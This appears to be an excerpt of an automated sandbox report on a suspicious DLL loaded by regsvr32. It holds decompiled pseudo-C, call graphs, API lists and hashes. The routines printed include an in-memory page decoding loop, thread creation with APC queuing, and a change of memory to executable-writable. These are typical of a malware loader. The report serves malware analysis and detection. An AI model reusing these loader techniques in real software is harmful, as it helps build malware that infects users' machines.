                                                                                                                                                                                      • Part of subcall function 04D8AEA2: __decode_pointer.LIBCMT ref: 04D8AEB3
                                                                                                                                                                                      • Part of subcall function 04D8AEA2: TlsFree.KERNEL32(04DE4824,04D8B343), ref: 04D8AECD
                                                                                                                                                                                    • TlsAlloc.KERNEL32 ref: 04D8B263
                                                                                                                                                                                    • __init_pointers.LIBCMT ref: 04D8B288
                                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 04D8B293
                                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 04D8B2A3
                                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 04D8B2B3
                                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 04D8B2C3
                                                                                                                                                                                    • __decode_pointer.LIBCMT ref: 04D8B2E4
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D8B2FD
                                                                                                                                                                                    • __decode_pointer.LIBCMT ref: 04D8B317
                                                                                                                                                                                    • __initptd.LIBCMT ref: 04D8B326
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04D8B32D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2061501447-0
                                                                                                                                                                                    • Opcode ID: 1c5f4d6f51562d5f5a21d5139ef8fe9f1882bf94c0e43e5068079dafc5a9f0bf
                                                                                                                                                                                    • Instruction ID: 2bfbecc2a57b7d0787e08203d15592ebb39b311c880fb2a0e0d847e2d5f6dcf0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c5f4d6f51562d5f5a21d5139ef8fe9f1882bf94c0e43e5068079dafc5a9f0bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27317231A003119BDB11BFB7F859A7E3AA5EB25752B00453FF410DA294EB79B840CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 142 4d71e04-4d71e18 143 4d71e1a-4d71e1b 142->143 144 4d71e89-4d71e96 InterlockedDecrement 142->144 145 4d71ed6-4d71edd 143->145 147 4d71e21-4d71e2e InterlockedIncrement 143->147 144->145 146 4d71e98-4d71e9e 144->146 148 4d71ea0 146->148 149 4d71eca-4d71ed0 HeapDestroy 146->149 147->145 150 4d71e34-4d71e48 HeapCreate 147->150 151 4d71ea5-4d71eb5 SleepEx 148->151 149->145 152 4d71e84-4d71e87 150->152 153 4d71e4a-4d71e7b call 4d71ee0 call 4d71ca4 150->153 154 4d71eb7-4d71ebc 151->154 155 4d71ebe-4d71ec4 CloseHandle 151->155 152->145 153->145 160 4d71e7d-4d71e80 153->160 154->151 154->155 155->149 160->152
                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                    				char _t9;
                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                    
                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                    				_t9 = _a8;
                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                    					_t10 = InterlockedDecrement(0x4d74188);
                                                                                                                                                                                    					__eflags = _t10;
                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                    						__eflags =  *0x4d7418c;
                                                                                                                                                                                    						if( *0x4d7418c != 0) {
                                                                                                                                                                                    							_t36 = 0x2328;
                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                    								SleepEx(0x64, 1);
                                                                                                                                                                                    								__eflags =  *0x4d74198;
                                                                                                                                                                                    								if( *0x4d74198 == 0) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t36 = _t36 - 0x64;
                                                                                                                                                                                    								__eflags = _t36;
                                                                                                                                                                                    								if(_t36 > 0) {
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							CloseHandle( *0x4d7418c);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						HeapDestroy( *0x4d74190);
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					if(_t9 == 1 && InterlockedIncrement(0x4d74188) == 1) {
                                                                                                                                                                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                    						_t41 = _t18;
                                                                                                                                                                                    						 *0x4d74190 = _t18;
                                                                                                                                                                                    						if(_t18 == 0) {
                                                                                                                                                                                    							L6:
                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							 *0x4d741b0 = _a4;
                                                                                                                                                                                    							asm("lock xadd [eax], edi");
                                                                                                                                                                                    							_push( &_a8);
                                                                                                                                                                                    							_t23 = E04D71CA4(E04D71D32, E04D71EE0(_a12, 1, 0x4d74198, _t41));
                                                                                                                                                                                    							 *0x4d7418c = _t23;
                                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                                    								asm("lock xadd [esi], eax");
                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                    			}












                                                                                                                                                                                    0x04d71e07
                                                                                                                                                                                    0x04d71e13
                                                                                                                                                                                    0x04d71e15
                                                                                                                                                                                    0x04d71e18
                                                                                                                                                                                    0x04d71e8e
                                                                                                                                                                                    0x04d71e94
                                                                                                                                                                                    0x04d71e96
                                                                                                                                                                                    0x04d71e98
                                                                                                                                                                                    0x04d71e9e
                                                                                                                                                                                    0x04d71ea0
                                                                                                                                                                                    0x04d71ea5
                                                                                                                                                                                    0x04d71ea8
                                                                                                                                                                                    0x04d71eb3
                                                                                                                                                                                    0x04d71eb5
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71eb7
                                                                                                                                                                                    0x04d71eba
                                                                                                                                                                                    0x04d71ebc
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71ebc
                                                                                                                                                                                    0x04d71ec4
                                                                                                                                                                                    0x04d71ec4
                                                                                                                                                                                    0x04d71ed0
                                                                                                                                                                                    0x04d71ed0
                                                                                                                                                                                    0x04d71e1a
                                                                                                                                                                                    0x04d71e1b
                                                                                                                                                                                    0x04d71e3b
                                                                                                                                                                                    0x04d71e41
                                                                                                                                                                                    0x04d71e43
                                                                                                                                                                                    0x04d71e48
                                                                                                                                                                                    0x04d71e84
                                                                                                                                                                                    0x04d71e84
                                                                                                                                                                                    0x04d71e4a
                                                                                                                                                                                    0x04d71e52
                                                                                                                                                                                    0x04d71e59
                                                                                                                                                                                    0x04d71e63
                                                                                                                                                                                    0x04d71e6f
                                                                                                                                                                                    0x04d71e76
                                                                                                                                                                                    0x04d71e7b
                                                                                                                                                                                    0x04d71e80
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71e80
                                                                                                                                                                                    0x04d71e7b
                                                                                                                                                                                    0x04d71e48
                                                                                                                                                                                    0x04d71e1b
                                                                                                                                                                                    0x04d71edd

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(04D74188), ref: 04D71E26
                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04D71E3B
                                                                                                                                                                                      • Part of subcall function 04D71CA4: CreateThread.KERNEL32 ref: 04D71CBB
                                                                                                                                                                                      • Part of subcall function 04D71CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 04D71CD0
                                                                                                                                                                                      • Part of subcall function 04D71CA4: GetLastError.KERNEL32(00000000), ref: 04D71CDB
                                                                                                                                                                                      • Part of subcall function 04D71CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 04D71CE5
                                                                                                                                                                                      • Part of subcall function 04D71CA4: CloseHandle.KERNEL32(00000000), ref: 04D71CEC
                                                                                                                                                                                      • Part of subcall function 04D71CA4: SetLastError.KERNEL32(00000000), ref: 04D71CF5
                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(04D74188), ref: 04D71E8E
                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 04D71EA8
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 04D71EC4
                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 04D71ED0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2110400756-0
                                                                                                                                                                                    • Opcode ID: 745b82e17387b60488825889b8656562e92d3f988a859eccb3e3fd918dbcbe6c
                                                                                                                                                                                    • Instruction ID: 81d868449ccb85b516fe09ddc07dbb5871be605a0137db4fcf942229dacd5805
                                                                                                                                                                                    • Opcode Fuzzy Hash: 745b82e17387b60488825889b8656562e92d3f988a859eccb3e3fd918dbcbe6c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B219D71B00225EFDB21AFA9EC94A5E7BE8FB557A07100229E945D3340FB38AD04DB60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E04D71CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                                    				_Unknown_base(*)()* _v0;
                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                    				long _t11;
                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x4d741cc, 0, _a12); // executed
                                                                                                                                                                                    				_t13 = _t4;
                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                    						_t11 = GetLastError();
                                                                                                                                                                                    						TerminateThread(_t13, _t11);
                                                                                                                                                                                    						CloseHandle(_t13);
                                                                                                                                                                                    						_t13 = 0;
                                                                                                                                                                                    						SetLastError(_t11);
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                    			}








                                                                                                                                                                                    0x04d71cbb
                                                                                                                                                                                    0x04d71cc1
                                                                                                                                                                                    0x04d71cc5
                                                                                                                                                                                    0x04d71cd0
                                                                                                                                                                                    0x04d71cd8
                                                                                                                                                                                    0x04d71ce1
                                                                                                                                                                                    0x04d71ce5
                                                                                                                                                                                    0x04d71cec
                                                                                                                                                                                    0x04d71cf3
                                                                                                                                                                                    0x04d71cf5
                                                                                                                                                                                    0x04d71cfb
                                                                                                                                                                                    0x04d71cd8
                                                                                                                                                                                    0x04d71cff

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 04D71CBB
                                                                                                                                                                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 04D71CD0
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 04D71CDB
                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 04D71CE5
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04D71CEC
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 04D71CF5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3832013932-0
                                                                                                                                                                                    • Opcode ID: 6ed331262e7c297a0b3d237fa9a98c945fddf4178ffbbd12180c49eccfb60213
                                                                                                                                                                                    • Instruction ID: 5bb1c695cb7443df921364bc14fecf7ffb4e6c4834740a0f526a706acb7c52f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed331262e7c297a0b3d237fa9a98c945fddf4178ffbbd12180c49eccfb60213
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF0F836305621BBD7226FA0AC1CF5FBE69FB08751F004904FE0991350E7298C11EBA6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 165 4d80100-4d80126 166 4d80128-4d80191 165->166 167 4d80197-4d801ee VirtualProtectEx 165->167 166->167 168 4d8022f-4d8024f 167->168 169 4d801f0-4d8022a 167->169 170 4d802a0-4d802c5 168->170 171 4d80251-4d8029c 168->171 169->168 172 4d8032c-4d80339 170->172 173 4d802c7 170->173 171->170 176 4d8033b-4d8038e 172->176 177 4d80392-4d803ed 172->177 174 4d802c9-4d802d2 173->174 175 4d802d4-4d80328 173->175 174->172 174->175 175->172 176->177
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(000000FF,04EE9DDC,0000304B,00000040,?), ref: 04D801DD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID: K0$ K0$ K0$K0
                                                                                                                                                                                    • API String ID: 544645111-2055335449
                                                                                                                                                                                    • Opcode ID: b8caec1b1dfdbc12bb5426d8ff108af1f67e06dcdfeca654d61d4cc0ca02daff
                                                                                                                                                                                    • Instruction ID: db215b57c73ab7a2a692b373bce112c956f1ae33fe6f82d033869c949514bc0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: b8caec1b1dfdbc12bb5426d8ff108af1f67e06dcdfeca654d61d4cc0ca02daff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F913971B00128CFD708EF6EE4A0A697BFAFB88304B05C6A9D4599B385D77C6D44CB54
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 178 4d715a3-4d715c4 call 4d71a4b 181 4d716b6-4d716bb 178->181 182 4d715ca-4d71604 VirtualAlloc 178->182 183 4d716ae 182->183 184 4d7160a-4d7160e 182->184 185 4d716b5 183->185 186 4d71676 184->186 187 4d71610-4d71626 184->187 185->181 189 4d7167b-4d71680 186->189 188 4d7162b-4d71671 call 4d71d02 187->188 195 4d71673-4d71674 188->195 196 4d71628 188->196 190 4d71695 189->190 191 4d71682-4d71693 memcpy 189->191 193 4d7169c-4d716ac VirtualFree 190->193 191->193 193->185 195->189 196->188
                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                    			E04D715A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t77 =  *0x4d741b0;
                                                                                                                                                                                    				_t39 = E04D71A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                    				_v16 = _t39;
                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                    					asm("sbb ebx, ebx");
                                                                                                                                                                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                    					_t78 = _t77 + _v20;
                                                                                                                                                                                    					_v36 = _t78;
                                                                                                                                                                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                    					_v24 = _t46;
                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                    						_v16 = 8;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                    						if(_t59 <= 0) {
                                                                                                                                                                                    							_t47 =  *0x4d741cc;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_t66 = _a4;
                                                                                                                                                                                    							_t50 = _t46 - _t78;
                                                                                                                                                                                    							_t11 = _t66 + 0x4d75137; // 0x4d75137
                                                                                                                                                                                    							_v28 = _t50;
                                                                                                                                                                                    							_v32 = _t50 + _t11;
                                                                                                                                                                                    							_v8 = _t78;
                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                    								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                    								_t80 = _t19;
                                                                                                                                                                                    								E04D71D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                    								_t64 = _v32;
                                                                                                                                                                                    								_v8 = _v8 + 0x1000;
                                                                                                                                                                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                    								_t61 = _t80;
                                                                                                                                                                                    								 *0x4d741cc = _t47;
                                                                                                                                                                                    								if(_t61 >= _t59) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t50 = _v28;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                    							_v16 = 0xc;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                    			}























                                                                                                                                                                                    0x04d715aa
                                                                                                                                                                                    0x04d715ba
                                                                                                                                                                                    0x04d715c1
                                                                                                                                                                                    0x04d715c4
                                                                                                                                                                                    0x04d715d9
                                                                                                                                                                                    0x04d715e0
                                                                                                                                                                                    0x04d715e5
                                                                                                                                                                                    0x04d715f6
                                                                                                                                                                                    0x04d715f9
                                                                                                                                                                                    0x04d71601
                                                                                                                                                                                    0x04d71604
                                                                                                                                                                                    0x04d716ae
                                                                                                                                                                                    0x04d7160a
                                                                                                                                                                                    0x04d7160a
                                                                                                                                                                                    0x04d7160e
                                                                                                                                                                                    0x04d71676
                                                                                                                                                                                    0x04d71610
                                                                                                                                                                                    0x04d71610
                                                                                                                                                                                    0x04d71613
                                                                                                                                                                                    0x04d71615
                                                                                                                                                                                    0x04d7161d
                                                                                                                                                                                    0x04d71620
                                                                                                                                                                                    0x04d71623
                                                                                                                                                                                    0x04d7162b
                                                                                                                                                                                    0x04d71633
                                                                                                                                                                                    0x04d71634
                                                                                                                                                                                    0x04d71635
                                                                                                                                                                                    0x04d7163c
                                                                                                                                                                                    0x04d7163c
                                                                                                                                                                                    0x04d71650
                                                                                                                                                                                    0x04d71655
                                                                                                                                                                                    0x04d7165e
                                                                                                                                                                                    0x04d71665
                                                                                                                                                                                    0x04d71668
                                                                                                                                                                                    0x04d7166c
                                                                                                                                                                                    0x04d71671
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71628
                                                                                                                                                                                    0x04d71628
                                                                                                                                                                                    0x04d71673
                                                                                                                                                                                    0x04d71680
                                                                                                                                                                                    0x04d71695
                                                                                                                                                                                    0x04d71682
                                                                                                                                                                                    0x04d7168b
                                                                                                                                                                                    0x04d71690
                                                                                                                                                                                    0x04d716a6
                                                                                                                                                                                    0x04d716a6
                                                                                                                                                                                    0x04d716b5
                                                                                                                                                                                    0x04d716bb

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 04D715F9
                                                                                                                                                                                    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,04D717EC), ref: 04D7168B
                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 04D716A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                    • String ID: Mar 26 2021
                                                                                                                                                                                    • API String ID: 4010158826-2175073649
                                                                                                                                                                                    • Opcode ID: bb4c830e8d75d39d7628478a0f86ae6a151f939c0aaaebf31fb4cb8030995564
                                                                                                                                                                                    • Instruction ID: 6207703ffe5429471862425b65ef4ac9ec63cdedf1a87058513df9f610917317
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb4c830e8d75d39d7628478a0f86ae6a151f939c0aaaebf31fb4cb8030995564
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F313071E00219ABDB01DF99D881AEEB7B5FF48704F148269E905AB344F775AE05CF90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                    			E04D71D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                    				int _t4;
                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t13 = GetCurrentThread();
                                                                                                                                                                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t4 = E04D717A7(_a4); // executed
                                                                                                                                                                                    				_t9 = _t4;
                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                    					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                    				return _t9;
                                                                                                                                                                                    			}







                                                                                                                                                                                    0x04d71d3b
                                                                                                                                                                                    0x04d71d40
                                                                                                                                                                                    0x04d71d4e
                                                                                                                                                                                    0x04d71d53
                                                                                                                                                                                    0x04d71d53
                                                                                                                                                                                    0x04d71d59
                                                                                                                                                                                    0x04d71d5e
                                                                                                                                                                                    0x04d71d62
                                                                                                                                                                                    0x04d71d66
                                                                                                                                                                                    0x04d71d66
                                                                                                                                                                                    0x04d71d70
                                                                                                                                                                                    0x04d71d79

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 04D71D35
                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 04D71D40
                                                                                                                                                                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 04D71D53
                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 04D71D66
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                    • Opcode ID: 1c61c3b5da8f38b166ba2eede616d77b85cc76cf1c1619efe4f10d951728688d
                                                                                                                                                                                    • Instruction ID: d97a83ac2bd61ea46a23fe9706e038a800e60e7fc378a6c7af83a35a921bd024
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c61c3b5da8f38b166ba2eede616d77b85cc76cf1c1619efe4f10d951728688d
                                                                                                                                                                                    • Instruction Fuzzy Hash: FCE092313053206BE3122E2D5C89E6F7B9CEF923357110325F924D23D0FB589C09D9A5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 442 4d89447-4d89465 HeapCreate 443 4d8946a-4d89477 call 4d893ec 442->443 444 4d89467-4d89469 442->444 447 4d89479-4d89486 call 4d88496 443->447 448 4d8949d-4d894a0 443->448 447->448 451 4d89488-4d8949b HeapDestroy 447->451 451->444
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,04D83AF1,00000001), ref: 04D89458
                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 04D8948E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
